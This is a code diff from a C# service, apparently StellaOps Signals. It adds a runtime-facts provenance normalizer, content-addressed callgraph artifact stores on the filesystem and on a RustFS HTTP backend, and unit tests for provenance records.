ObservedBy = DetermineObserver(evt),
Confidence = ComputeConfidence(evt),
Facts = facts,
Evidence = evidence
};
}
private static string DetermineRecordType(RuntimeFactEvent evt)
{
// Determine record type based on available metadata
if (!string.IsNullOrWhiteSpace(evt.ProcessName) || evt.ProcessId.HasValue)
{
return "runtime.process.observed";
}
if (!string.IsNullOrWhiteSpace(evt.SocketAddress))
{
return "runtime.network.connection";
}
if (!string.IsNullOrWhiteSpace(evt.ContainerId))
{
return "runtime.container.activity";
}
if (!string.IsNullOrWhiteSpace(evt.Purl))
{
return "runtime.package.loaded";
}
return "runtime.symbol.invoked";
}
private static ProvenanceSubjectType DetermineSubjectType(RuntimeFactEvent evt, ReachabilitySubject subject)
{
// Priority: container > process > package > file
if (!string.IsNullOrWhiteSpace(evt.ContainerId))
{
return ProvenanceSubjectType.Container;
}
if (!string.IsNullOrWhiteSpace(evt.ProcessName) || evt.ProcessId.HasValue)
{
return ProvenanceSubjectType.Process;
}
if (!string.IsNullOrWhiteSpace(evt.Purl))
{
return ProvenanceSubjectType.Package;
}
if (!string.IsNullOrWhiteSpace(subject.ImageDigest))
{
return ProvenanceSubjectType.Image;
}
return ProvenanceSubjectType.Package;
}
private static string BuildSubjectIdentifier(RuntimeFactEvent evt, ReachabilitySubject subject)
{
// Build identifier based on available data
if (!string.IsNullOrWhiteSpace(evt.Purl))
{
return evt.Purl.Trim();
}
if (!string.IsNullOrWhiteSpace(evt.ContainerId))
{
return evt.ContainerId.Trim();
}
if (!string.IsNullOrWhiteSpace(subject.ImageDigest))
{
return subject.ImageDigest;
}
if (!string.IsNullOrWhiteSpace(subject.Component))
{
return string.IsNullOrWhiteSpace(subject.Version)
? subject.Component
: $"{subject.Component}@{subject.Version}";
}
return evt.SymbolId.Trim();
}
private static string? NormalizeDigest(string? digest)
{
if (string.IsNullOrWhiteSpace(digest))
{
return null;
}
var trimmed = digest.Trim();
// Ensure sha256: prefix for valid hex digests
if (trimmed.StartsWith("sha256:", StringComparison.OrdinalIgnoreCase))
{
return trimmed.ToLowerInvariant();
}
// If it looks like a hex digest (64 chars), add prefix
if (trimmed.Length == 64 && IsHexString(trimmed))
{
return $"sha256:{trimmed.ToLowerInvariant()}";
}
return trimmed;
}
private static bool IsHexString(string value)
{
foreach (var c in value)
{
if (!((c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') || (c >= 'A' && c <= 'F')))
{
return false;
}
}
return true;
}
private static string? ExtractNamespace(string? containerId, ReachabilitySubject subject)
{
// Try to extract namespace from container ID or subject metadata
if (!string.IsNullOrWhiteSpace(containerId) && containerId.Contains('/'))
{
var parts = containerId.Split('/');
if (parts.Length > 1)
{
return parts[0];
}
}
return null;
}
private static RecordEvidence? BuildEvidence(RuntimeFactEvent evt)
{
if (string.IsNullOrWhiteSpace(evt.EvidenceUri) && string.IsNullOrWhiteSpace(evt.SymbolDigest))
{
return null;
}
var captureMethod = DetermineCaptureMethod(evt);
return new RecordEvidence
{
SourceDigest = NormalizeDigest(evt.SymbolDigest),
CaptureMethod = captureMethod,
RawDataRef = Normalize(evt.EvidenceUri)
};
}
private static EvidenceCaptureMethod? DetermineCaptureMethod(RuntimeFactEvent evt)
{
// Infer capture method from event metadata
if (evt.Metadata is not null)
{
if (evt.Metadata.TryGetValue("captureMethod", out var method) && !string.IsNullOrWhiteSpace(method))
{
return method.ToUpperInvariant() switch
{
"EBPF" => EvidenceCaptureMethod.EBpf,
"PROC_SCAN" => EvidenceCaptureMethod.ProcScan,
"API_CALL" => EvidenceCaptureMethod.ApiCall,
"LOG_ANALYSIS" => EvidenceCaptureMethod.LogAnalysis,
"STATIC_ANALYSIS" => EvidenceCaptureMethod.StaticAnalysis,
_ => null
};
}
}
// Default based on available data
if (evt.ProcessId.HasValue || !string.IsNullOrWhiteSpace(evt.ProcessName))
{
return EvidenceCaptureMethod.ProcScan;
}
return EvidenceCaptureMethod.ApiCall;
}
private static string? DetermineObserver(RuntimeFactEvent evt)
{
if (evt.Metadata is not null && evt.Metadata.TryGetValue("observer", out var observer))
{
return Normalize(observer);
}
if (!string.IsNullOrWhiteSpace(evt.ContainerId))
{
return "container-runtime-agent";
}
if (evt.ProcessId.HasValue)
{
return "process-monitor-agent";
}
return "signals-ingestion";
}
private static double ComputeConfidence(RuntimeFactEvent evt)
{
// Base confidence
var confidence = DefaultConfidence;
// Adjust based on available evidence
if (!string.IsNullOrWhiteSpace(evt.SymbolDigest))
{
confidence = Math.Min(confidence + 0.02, 1.0);
}
if (!string.IsNullOrWhiteSpace(evt.EvidenceUri))
{
confidence = Math.Min(confidence + 0.01, 1.0);
}
if (evt.ProcessId.HasValue && !string.IsNullOrWhiteSpace(evt.ProcessName))
{
confidence = Math.Min(confidence + 0.01, 1.0);
}
return Math.Round(confidence, 2);
}
private static string? Normalize(string? value) =>
string.IsNullOrWhiteSpace(value) ? null : value.Trim();
}

View File

@@ -1,5 +1,4 @@
using System; using System;
using System.Globalization;
using System.IO; using System.IO;
using System.Threading; using System.Threading;
using System.Threading.Tasks; using System.Threading.Tasks;
@@ -15,14 +14,17 @@ namespace StellaOps.Signals.Storage;
/// </summary> /// </summary>
internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
{ {
private readonly SignalsArtifactStorageOptions storageOptions; private const string DefaultFileName = "callgraph.json";
private readonly ILogger<FileSystemCallgraphArtifactStore> logger; private const string ManifestFileName = "manifest.json";
private readonly SignalsArtifactStorageOptions _storageOptions;
private readonly ILogger<FileSystemCallgraphArtifactStore> _logger;
public FileSystemCallgraphArtifactStore(IOptions<SignalsOptions> options, ILogger<FileSystemCallgraphArtifactStore> logger) public FileSystemCallgraphArtifactStore(IOptions<SignalsOptions> options, ILogger<FileSystemCallgraphArtifactStore> logger)
{ {
ArgumentNullException.ThrowIfNull(options); ArgumentNullException.ThrowIfNull(options);
storageOptions = options.Value.Storage; _storageOptions = options.Value.Storage;
this.logger = logger ?? throw new ArgumentNullException(nameof(logger)); _logger = logger ?? throw new ArgumentNullException(nameof(logger));
} }
public async Task<StoredCallgraphArtifact> SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken) public async Task<StoredCallgraphArtifact> SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken)
@@ -30,17 +32,17 @@ internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
ArgumentNullException.ThrowIfNull(request); ArgumentNullException.ThrowIfNull(request);
ArgumentNullException.ThrowIfNull(content); ArgumentNullException.ThrowIfNull(content);
var root = storageOptions.RootPath; var root = _storageOptions.RootPath;
var hash = request.Hash?.Trim().ToLowerInvariant(); var hash = NormalizeHash(request.Hash);
if (string.IsNullOrWhiteSpace(hash)) if (string.IsNullOrWhiteSpace(hash))
{ {
throw new InvalidOperationException("Callgraph artifact hash is required for CAS storage."); throw new InvalidOperationException("Callgraph artifact hash is required for CAS storage.");
} }
var casDirectory = Path.Combine(root, "cas", "reachability", "graphs", hash.Substring(0, Math.Min(hash.Length, 2)), hash); var casDirectory = GetCasDirectory(hash);
Directory.CreateDirectory(casDirectory); Directory.CreateDirectory(casDirectory);
var fileName = SanitizeFileName(string.IsNullOrWhiteSpace(request.FileName) ? "callgraph.json" : request.FileName); var fileName = SanitizeFileName(string.IsNullOrWhiteSpace(request.FileName) ? DefaultFileName : request.FileName);
var destinationPath = Path.Combine(casDirectory, fileName); var destinationPath = Path.Combine(casDirectory, fileName);
await using (var fileStream = File.Create(destinationPath)) await using (var fileStream = File.Create(destinationPath))
@@ -48,7 +50,7 @@ internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
await content.CopyToAsync(fileStream, cancellationToken).ConfigureAwait(false); await content.CopyToAsync(fileStream, cancellationToken).ConfigureAwait(false);
} }
var manifestPath = Path.Combine(casDirectory, "manifest.json"); var manifestPath = Path.Combine(casDirectory, ManifestFileName);
if (request.ManifestContent != null) if (request.ManifestContent != null)
{ {
await using var manifestStream = File.Create(manifestPath); await using var manifestStream = File.Create(manifestPath);
@@ -61,7 +63,7 @@ internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
} }
var fileInfo = new FileInfo(destinationPath); var fileInfo = new FileInfo(destinationPath);
logger.LogInformation("Stored callgraph artifact at {Path} (length={Length}).", destinationPath, fileInfo.Length); _logger.LogInformation("Stored callgraph artifact at {Path} (length={Length}).", destinationPath, fileInfo.Length);
return new StoredCallgraphArtifact( return new StoredCallgraphArtifact(
Path.GetRelativePath(root, destinationPath), Path.GetRelativePath(root, destinationPath),
@@ -73,6 +75,88 @@ internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
$"cas://reachability/graphs/{hash}/manifest"); $"cas://reachability/graphs/{hash}/manifest");
} }
public Task<Stream?> GetAsync(string hash, string? fileName = null, CancellationToken cancellationToken = default)
{
var normalizedHash = NormalizeHash(hash);
if (string.IsNullOrWhiteSpace(normalizedHash))
{
return Task.FromResult<Stream?>(null);
}
var casDirectory = GetCasDirectory(normalizedHash);
var targetFileName = SanitizeFileName(string.IsNullOrWhiteSpace(fileName) ? DefaultFileName : fileName);
var filePath = Path.Combine(casDirectory, targetFileName);
if (!File.Exists(filePath))
{
_logger.LogDebug("Callgraph artifact {Hash}/{FileName} not found at {Path}.", normalizedHash, targetFileName, filePath);
return Task.FromResult<Stream?>(null);
}
var content = new MemoryStream();
using (var fileStream = File.OpenRead(filePath))
{
fileStream.CopyTo(content);
}
content.Position = 0;
_logger.LogDebug("Retrieved callgraph artifact {Hash}/{FileName} from {Path}.", normalizedHash, targetFileName, filePath);
return Task.FromResult<Stream?>(content);
}
public Task<Stream?> GetManifestAsync(string hash, CancellationToken cancellationToken = default)
{
var normalizedHash = NormalizeHash(hash);
if (string.IsNullOrWhiteSpace(normalizedHash))
{
return Task.FromResult<Stream?>(null);
}
var casDirectory = GetCasDirectory(normalizedHash);
var manifestPath = Path.Combine(casDirectory, ManifestFileName);
if (!File.Exists(manifestPath))
{
_logger.LogDebug("Callgraph manifest for {Hash} not found at {Path}.", normalizedHash, manifestPath);
return Task.FromResult<Stream?>(null);
}
var content = new MemoryStream();
using (var fileStream = File.OpenRead(manifestPath))
{
fileStream.CopyTo(content);
}
content.Position = 0;
_logger.LogDebug("Retrieved callgraph manifest for {Hash} from {Path}.", normalizedHash, manifestPath);
return Task.FromResult<Stream?>(content);
}
public Task<bool> ExistsAsync(string hash, CancellationToken cancellationToken = default)
{
var normalizedHash = NormalizeHash(hash);
if (string.IsNullOrWhiteSpace(normalizedHash))
{
return Task.FromResult(false);
}
var casDirectory = GetCasDirectory(normalizedHash);
var defaultPath = Path.Combine(casDirectory, DefaultFileName);
var exists = File.Exists(defaultPath);
_logger.LogDebug("Callgraph artifact {Hash} exists={Exists} at {Path}.", normalizedHash, exists, defaultPath);
return Task.FromResult(exists);
}
private string GetCasDirectory(string hash)
{
var prefix = hash.Length >= 2 ? hash[..2] : hash;
return Path.Combine(_storageOptions.RootPath, "cas", "reachability", "graphs", prefix, hash);
}
private static string? NormalizeHash(string? hash)
=> hash?.Trim().ToLowerInvariant();
private static string SanitizeFileName(string value) private static string SanitizeFileName(string value)
=> string.Join('_', value.Split(Path.GetInvalidFileNameChars(), StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries)).ToLowerInvariant(); => string.Join('_', value.Split(Path.GetInvalidFileNameChars(), StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries)).ToLowerInvariant();
} }

View File

@@ -6,9 +6,41 @@ using StellaOps.Signals.Storage.Models;
namespace StellaOps.Signals.Storage; namespace StellaOps.Signals.Storage;
/// <summary> /// <summary>
/// Persists raw callgraph artifacts. /// Persists and retrieves raw callgraph artifacts from content-addressable storage.
/// </summary> /// </summary>
public interface ICallgraphArtifactStore public interface ICallgraphArtifactStore
{ {
/// <summary>
/// Stores a callgraph artifact.
/// </summary>
/// <param name="request">Metadata about the artifact to store.</param>
/// <param name="content">The artifact content stream.</param>
/// <param name="cancellationToken">Cancellation token.</param>
/// <returns>Information about the stored artifact.</returns>
Task<StoredCallgraphArtifact> SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken); Task<StoredCallgraphArtifact> SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken);
/// <summary>
/// Retrieves a callgraph artifact by its hash.
/// </summary>
/// <param name="hash">The SHA-256 hash of the artifact.</param>
/// <param name="fileName">Optional file name (defaults to callgraph.json).</param>
/// <param name="cancellationToken">Cancellation token.</param>
/// <returns>The artifact content stream, or null if not found.</returns>
Task<Stream?> GetAsync(string hash, string? fileName = null, CancellationToken cancellationToken = default);
/// <summary>
/// Retrieves a callgraph manifest by artifact hash.
/// </summary>
/// <param name="hash">The SHA-256 hash of the artifact.</param>
/// <param name="cancellationToken">Cancellation token.</param>
/// <returns>The manifest content stream, or null if not found.</returns>
Task<Stream?> GetManifestAsync(string hash, CancellationToken cancellationToken = default);
/// <summary>
/// Checks if an artifact exists.
/// </summary>
/// <param name="hash">The SHA-256 hash of the artifact.</param>
/// <param name="cancellationToken">Cancellation token.</param>
/// <returns>True if the artifact exists.</returns>
Task<bool> ExistsAsync(string hash, CancellationToken cancellationToken = default);
} }

View File

@@ -0,0 +1,333 @@
using System;
using System.Globalization;
using System.IO;
using System.Linq;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using Microsoft.Extensions.Logging;
using Microsoft.Extensions.Options;
using StellaOps.Signals.Options;
using StellaOps.Signals.Storage.Models;
namespace StellaOps.Signals.Storage;
/// <summary>
/// Stores callgraph artifacts in RustFS (S3-compatible content-addressable storage).
/// </summary>
internal sealed class RustFsCallgraphArtifactStore : ICallgraphArtifactStore
{
internal const string HttpClientName = "signals-storage-rustfs";
private const string DefaultFileName = "callgraph.json";
private const string ManifestFileName = "manifest.json";
private const string ImmutableHeader = "X-RustFS-Immutable";
private const string RetainSecondsHeader = "X-RustFS-Retain-Seconds";
private static readonly MediaTypeHeaderValue OctetStream = new("application/octet-stream");
/// <summary>
/// Default retention for callgraph artifacts (90 days per CAS contract).
/// </summary>
private static readonly TimeSpan DefaultRetention = TimeSpan.FromDays(90);
private readonly IHttpClientFactory _httpClientFactory;
private readonly SignalsArtifactStorageOptions _storageOptions;
private readonly ILogger<RustFsCallgraphArtifactStore> _logger;
public RustFsCallgraphArtifactStore(
IHttpClientFactory httpClientFactory,
IOptions<SignalsOptions> options,
ILogger<RustFsCallgraphArtifactStore> logger)
{
_httpClientFactory = httpClientFactory ?? throw new ArgumentNullException(nameof(httpClientFactory));
ArgumentNullException.ThrowIfNull(options);
_storageOptions = options.Value.Storage;
_logger = logger ?? throw new ArgumentNullException(nameof(logger));
}
public async Task<StoredCallgraphArtifact> SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken)
{
ArgumentNullException.ThrowIfNull(request);
ArgumentNullException.ThrowIfNull(content);
var hash = NormalizeHash(request.Hash);
if (string.IsNullOrWhiteSpace(hash))
{
throw new InvalidOperationException("Callgraph artifact hash is required for CAS storage.");
}
var fileName = SanitizeFileName(string.IsNullOrWhiteSpace(request.FileName) ? DefaultFileName : request.FileName);
var objectKey = BuildObjectKey(hash, fileName);
// Store the artifact
await PutObjectAsync(objectKey, content, request.ContentType, cancellationToken).ConfigureAwait(false);
// Store the manifest
var manifestKey = BuildObjectKey(hash, ManifestFileName);
if (request.ManifestContent != null)
{
request.ManifestContent.Position = 0;
await PutObjectAsync(manifestKey, request.ManifestContent, "application/json", cancellationToken).ConfigureAwait(false);
}
else
{
// Create empty manifest placeholder
using var emptyManifest = new MemoryStream(Encoding.UTF8.GetBytes("{}"));
await PutObjectAsync(manifestKey, emptyManifest, "application/json", cancellationToken).ConfigureAwait(false);
}
var artifactLength = content.CanSeek ? content.Length : 0;
_logger.LogInformation("Stored callgraph artifact {Hash}/{FileName} in RustFS bucket {Bucket}.",
hash, fileName, _storageOptions.BucketName);
return new StoredCallgraphArtifact(
objectKey,
artifactLength,
hash,
request.ContentType,
$"cas://reachability/graphs/{hash}",
manifestKey,
$"cas://reachability/graphs/{hash}/manifest");
}
public async Task<Stream?> GetAsync(string hash, string? fileName = null, CancellationToken cancellationToken = default)
{
var normalizedHash = NormalizeHash(hash);
if (string.IsNullOrWhiteSpace(normalizedHash))
{
return null;
}
var targetFileName = SanitizeFileName(string.IsNullOrWhiteSpace(fileName) ? DefaultFileName : fileName);
var objectKey = BuildObjectKey(normalizedHash, targetFileName);
var result = await GetObjectAsync(objectKey, cancellationToken).ConfigureAwait(false);
if (result is null)
{
_logger.LogDebug("Callgraph artifact {Hash}/{FileName} not found in RustFS.", normalizedHash, targetFileName);
}
else
{
_logger.LogDebug("Retrieved callgraph artifact {Hash}/{FileName} from RustFS.", normalizedHash, targetFileName);
}
return result;
}
public async Task<Stream?> GetManifestAsync(string hash, CancellationToken cancellationToken = default)
{
var normalizedHash = NormalizeHash(hash);
if (string.IsNullOrWhiteSpace(normalizedHash))
{
return null;
}
var manifestKey = BuildObjectKey(normalizedHash, ManifestFileName);
var result = await GetObjectAsync(manifestKey, cancellationToken).ConfigureAwait(false);
if (result is null)
{
_logger.LogDebug("Callgraph manifest for {Hash} not found in RustFS.", normalizedHash);
}
else
{
_logger.LogDebug("Retrieved callgraph manifest for {Hash} from RustFS.", normalizedHash);
}
return result;
}
public async Task<bool> ExistsAsync(string hash, CancellationToken cancellationToken = default)
{
var normalizedHash = NormalizeHash(hash);
if (string.IsNullOrWhiteSpace(normalizedHash))
{
return false;
}
var objectKey = BuildObjectKey(normalizedHash, DefaultFileName);
var exists = await HeadObjectAsync(objectKey, cancellationToken).ConfigureAwait(false);
_logger.LogDebug("Callgraph artifact {Hash} exists={Exists} in RustFS.", normalizedHash, exists);
return exists;
}
private string BuildObjectKey(string hash, string fileName)
{
var prefix = hash.Length >= 2 ? hash[..2] : hash;
var rootPrefix = string.IsNullOrWhiteSpace(_storageOptions.RootPrefix) ? "callgraphs" : _storageOptions.RootPrefix;
return $"{rootPrefix}/{prefix}/{hash}/{fileName}";
}
private async Task PutObjectAsync(string objectKey, Stream content, string? contentType, CancellationToken cancellationToken)
{
var client = _httpClientFactory.CreateClient(HttpClientName);
using var request = new HttpRequestMessage(HttpMethod.Put, BuildRequestUri(objectKey))
{
Content = CreateHttpContent(content)
};
request.Content.Headers.ContentType = string.IsNullOrWhiteSpace(contentType)
? OctetStream
: new MediaTypeHeaderValue(contentType);
ApplyHeaders(request);
// Mark as immutable with 90-day retention per CAS contract
request.Headers.TryAddWithoutValidation(ImmutableHeader, "true");
var retainSeconds = Math.Ceiling(DefaultRetention.TotalSeconds);
request.Headers.TryAddWithoutValidation(RetainSecondsHeader, retainSeconds.ToString(CultureInfo.InvariantCulture));
using var response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, cancellationToken).ConfigureAwait(false);
if (!response.IsSuccessStatusCode)
{
var error = await ReadErrorAsync(response, cancellationToken).ConfigureAwait(false);
throw new InvalidOperationException(
$"RustFS upload for {_storageOptions.BucketName}/{objectKey} failed with status {(int)response.StatusCode} ({response.ReasonPhrase}). {error}");
}
_logger.LogDebug("Uploaded callgraph object {Bucket}/{Key} via RustFS.", _storageOptions.BucketName, objectKey);
}
private async Task<Stream?> GetObjectAsync(string objectKey, CancellationToken cancellationToken)
{
var client = _httpClientFactory.CreateClient(HttpClientName);
using var request = new HttpRequestMessage(HttpMethod.Get, BuildRequestUri(objectKey));
ApplyHeaders(request);
using var response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, cancellationToken).ConfigureAwait(false);
if (response.StatusCode == HttpStatusCode.NotFound)
{
return null;
}
if (!response.IsSuccessStatusCode)
{
var error = await ReadErrorAsync(response, cancellationToken).ConfigureAwait(false);
throw new InvalidOperationException(
$"RustFS download for {_storageOptions.BucketName}/{objectKey} failed with status {(int)response.StatusCode} ({response.ReasonPhrase}). {error}");
}
var buffer = new MemoryStream();
if (response.Content is not null)
{
await response.Content.CopyToAsync(buffer, cancellationToken).ConfigureAwait(false);
}
buffer.Position = 0;
return buffer;
}
private async Task<bool> HeadObjectAsync(string objectKey, CancellationToken cancellationToken)
{
var client = _httpClientFactory.CreateClient(HttpClientName);
using var request = new HttpRequestMessage(HttpMethod.Head, BuildRequestUri(objectKey));
ApplyHeaders(request);
using var response = await client.SendAsync(request, HttpCompletionOption.ResponseHeadersRead, cancellationToken).ConfigureAwait(false);
return response.StatusCode == HttpStatusCode.OK;
}
private Uri BuildRequestUri(string objectKey)
{
if (!Uri.TryCreate(_storageOptions.RustFs.BaseUrl, UriKind.Absolute, out var baseUri))
{
throw new InvalidOperationException("RustFS baseUrl is invalid.");
}
var encodedBucket = Uri.EscapeDataString(_storageOptions.BucketName);
var encodedKey = EncodeKey(objectKey);
var relativePath = new StringBuilder()
.Append("buckets/")
.Append(encodedBucket)
.Append("/objects/")
.Append(encodedKey)
.ToString();
return new Uri(baseUri, relativePath);
}
private static string EncodeKey(string key)
{
if (string.IsNullOrWhiteSpace(key))
{
return string.Empty;
}
var segments = key.Split('/', StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries);
return string.Join('/', segments.Select(Uri.EscapeDataString));
}
private void ApplyHeaders(HttpRequestMessage request)
{
var rustFsOptions = _storageOptions.RustFs;
if (!string.IsNullOrWhiteSpace(rustFsOptions.ApiKeyHeader) && !string.IsNullOrWhiteSpace(rustFsOptions.ApiKey))
{
request.Headers.TryAddWithoutValidation(rustFsOptions.ApiKeyHeader, rustFsOptions.ApiKey);
}
foreach (var header in _storageOptions.Headers)
{
request.Headers.TryAddWithoutValidation(header.Key, header.Value);
}
}
private static HttpContent CreateHttpContent(Stream content)
{
if (content is MemoryStream memoryStream)
{
if (memoryStream.TryGetBuffer(out var segment))
{
return new ByteArrayContent(segment.Array!, segment.Offset, segment.Count);
}
return new ByteArrayContent(memoryStream.ToArray());
}
if (content.CanSeek)
{
var originalPosition = content.Position;
try
{
content.Position = 0;
using var duplicate = new MemoryStream();
content.CopyTo(duplicate);
return new ByteArrayContent(duplicate.ToArray());
}
finally
{
content.Position = originalPosition;
}
}
using var buffer = new MemoryStream();
content.CopyTo(buffer);
return new ByteArrayContent(buffer.ToArray());
}
private static async Task<string> ReadErrorAsync(HttpResponseMessage response, CancellationToken cancellationToken)
{
if (response.Content is null)
{
return string.Empty;
}
var text = await response.Content.ReadAsStringAsync(cancellationToken).ConfigureAwait(false);
if (string.IsNullOrWhiteSpace(text))
{
return string.Empty;
}
var trimmed = text.Trim();
return trimmed.Length <= 512 ? trimmed : trimmed[..512];
}
private static string? NormalizeHash(string? hash)
=> hash?.Trim().ToLowerInvariant();
private static string SanitizeFileName(string value)
=> string.Join('_', value.Split(Path.GetInvalidFileNameChars(), StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries)).ToLowerInvariant();
}

View File

@@ -17,12 +17,14 @@ public class RuntimeFactsIngestionServiceTests
var scoringService = new RecordingScoringService(); var scoringService = new RecordingScoringService();
var cache = new InMemoryReachabilityCache(); var cache = new InMemoryReachabilityCache();
var eventsPublisher = new RecordingEventsPublisher(); var eventsPublisher = new RecordingEventsPublisher();
var provenanceNormalizer = new RuntimeFactsProvenanceNormalizer();
var service = new RuntimeFactsIngestionService( var service = new RuntimeFactsIngestionService(
factRepository, factRepository,
TimeProvider.System, TimeProvider.System,
cache, cache,
eventsPublisher, eventsPublisher,
scoringService, scoringService,
provenanceNormalizer,
NullLogger<RuntimeFactsIngestionService>.Instance); NullLogger<RuntimeFactsIngestionService>.Instance);
var request = new RuntimeFactsIngestRequest var request = new RuntimeFactsIngestRequest
@@ -61,6 +63,21 @@ public class RuntimeFactsIngestionServiceTests
Assert.Equal("runtime", persisted.Metadata?["provenance.source"]); Assert.Equal("runtime", persisted.Metadata?["provenance.source"]);
Assert.Equal("cg-123", persisted.Metadata?["provenance.callgraphId"]); Assert.Equal("cg-123", persisted.Metadata?["provenance.callgraphId"]);
Assert.NotNull(persisted.Metadata?["provenance.ingestedAt"]); Assert.NotNull(persisted.Metadata?["provenance.ingestedAt"]);
// Verify context_facts with AOC provenance (SIGNALS-24-003)
Assert.NotNull(persisted.ContextFacts);
Assert.NotNull(persisted.ContextFacts.Provenance);
Assert.Equal(1, persisted.ContextFacts.Provenance.SchemaVersion);
Assert.Equal(ProvenanceFeedType.RuntimeFacts, persisted.ContextFacts.Provenance.FeedType);
Assert.Equal(3, persisted.ContextFacts.RecordCount); // Three events (provenance tracks each observation)
Assert.NotEmpty(persisted.ContextFacts.Provenance.Records);
Assert.All(persisted.ContextFacts.Provenance.Records, record =>
{
Assert.NotEmpty(record.RecordId);
Assert.NotEmpty(record.RecordType);
Assert.NotNull(record.Subject);
Assert.NotNull(record.Facts);
});
} }
private sealed class InMemoryReachabilityFactRepository : IReachabilityFactRepository private sealed class InMemoryReachabilityFactRepository : IReachabilityFactRepository

View File

@@ -0,0 +1,400 @@
using System;
using System.Collections.Generic;
using System.Linq;
using StellaOps.Signals.Models;
using StellaOps.Signals.Services;
using Xunit;
namespace StellaOps.Signals.Tests;
public class RuntimeFactsProvenanceNormalizerTests
{
private readonly RuntimeFactsProvenanceNormalizer _normalizer = new();
[Fact]
public void NormalizeToFeed_CreatesValidProvenanceFeed()
{
var events = new List<RuntimeFactEvent>
{
new() { SymbolId = "svc.foo", HitCount = 5 },
new() { SymbolId = "svc.bar", HitCount = 3 }
};
var subject = new ReachabilitySubject { Component = "web", Version = "1.0.0" };
var timestamp = DateTimeOffset.Parse("2025-12-07T10:00:00Z");
var feed = _normalizer.NormalizeToFeed(events, subject, "cg-123", null, timestamp);
Assert.Equal(1, feed.SchemaVersion);
Assert.Equal(ProvenanceFeedType.RuntimeFacts, feed.FeedType);
Assert.NotEmpty(feed.FeedId);
Assert.Equal(timestamp, feed.GeneratedAt);
Assert.Equal("signals-runtime-ingestion", feed.SourceService);
Assert.Equal("cg-123", feed.CorrelationId);
Assert.Equal(2, feed.Records.Count);
}
[Fact]
public void NormalizeToFeed_PopulatesAocMetadata()
{
var events = new List<RuntimeFactEvent>
{
new() { SymbolId = "svc.foo", HitCount = 1 }
};
var subject = new ReachabilitySubject { Component = "web", Version = "1.0.0" };
var requestMetadata = new Dictionary<string, string?> { ["source"] = "ebpf-agent" };
var feed = _normalizer.NormalizeToFeed(events, subject, "cg-456", requestMetadata, DateTimeOffset.UtcNow);
Assert.NotNull(feed.Metadata);
Assert.Equal("1", feed.Metadata["aoc.version"]);
Assert.Equal("SGSI0101", feed.Metadata["aoc.contract"]);
Assert.Equal("cg-456", feed.Metadata["callgraphId"]);
Assert.Equal("web|1.0.0", feed.Metadata["subjectKey"]);
Assert.Equal("ebpf-agent", feed.Metadata["request.source"]);
}
[Fact]
public void NormalizeToFeed_SetsRecordTypeBasedOnProcessMetadata()
{
var evt = new RuntimeFactEvent
{
SymbolId = "svc.foo",
ProcessName = "python3",
ProcessId = 12345,
HitCount = 1
};
var subject = new ReachabilitySubject { Component = "api", Version = "2.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-test", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
Assert.Equal("runtime.process.observed", feed.Records[0].RecordType);
Assert.Equal(ProvenanceSubjectType.Process, feed.Records[0].Subject.Type);
}
[Fact]
public void NormalizeToFeed_SetsRecordTypeForNetworkConnection()
{
var evt = new RuntimeFactEvent
{
SymbolId = "net.connect",
SocketAddress = "10.0.0.1:8080",
HitCount = 1
};
var subject = new ReachabilitySubject { Component = "gateway", Version = "1.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-net", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
Assert.Equal("runtime.network.connection", feed.Records[0].RecordType);
}
[Fact]
public void NormalizeToFeed_SetsRecordTypeForContainerActivity()
{
var evt = new RuntimeFactEvent
{
SymbolId = "container.exec",
ContainerId = "abc123def456",
HitCount = 1
};
var subject = new ReachabilitySubject { ImageDigest = "sha256:deadbeef" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-container", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
Assert.Equal("runtime.container.activity", feed.Records[0].RecordType);
Assert.Equal(ProvenanceSubjectType.Container, feed.Records[0].Subject.Type);
}
[Fact]
public void NormalizeToFeed_SetsRecordTypeForPackageLoaded()
{
var evt = new RuntimeFactEvent
{
SymbolId = "pkg.load",
Purl = "pkg:npm/lodash@4.17.21",
HitCount = 1
};
var subject = new ReachabilitySubject { Component = "webapp", Version = "1.0.0" };
var feed = _normalizer.NormalizeToFeed(new[] { evt }, subject, "cg-pkg", null, DateTimeOffset.UtcNow);
Assert.Single(feed.Records);
Assert.Equal("runtime.package.loaded", feed.Records[0].RecordType);
Assert.Equal(ProvenanceSubjectType.Package, feed.Records[0].Subject.Type);
Assert.Equal("pkg:npm/lodash@4.17.21", feed.Records[0].Subject.Identifier);
}
[Fact]
public void NormalizeToFeed_PopulatesRuntimeProvenanceFacts()
{
var evt = new RuntimeFactEvent
{
SymbolId = "svc.handler",
ProcessName = "java",
ProcessId = 9999,
SocketAddress = "localhost:3306",
ContainerId = "k8s_pod_abc",
HitCount = 42,
Purl = "pkg:maven/com.example/lib@1.0.0",
CodeId = "code-123",
BuildId = "build-456",
LoaderBase = "/usr/lib/jvm",
Metadata = new Dictionary<string, string?> { ["env"] = "prod" }
};
var subject = new ReachabilitySubject { Component = "svc", Version = "3.0.0" };
